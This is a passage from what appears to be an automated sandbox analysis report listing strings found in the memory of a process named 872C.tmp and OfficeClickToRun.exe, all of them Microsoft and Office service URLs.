    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d3
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dvideo
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2AF0000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2012043324.00000248C2AB8000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1es2
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/sharedfilepickerker
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videohostpage/videodeoq
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videopickerker
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://identity.osi.office.net/v1/tokenken
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comext28
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comffice
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comfile/3
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comom553
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.come1-
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comn-1
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingntFlag
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bingt
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://invites.office.com/Bearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechioseOH
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices3
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoicestion~
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/err.srfr.srfceo$
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srft.srf
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_token.srfn.srf
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeqO
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392408338.0000000003D60000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393595398.0000000003D26000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392408338.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394188424.0000000005646000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392543505.0000000003CEA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394240204.0000000003F7C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393595398.0000000003CEA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392489428.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize
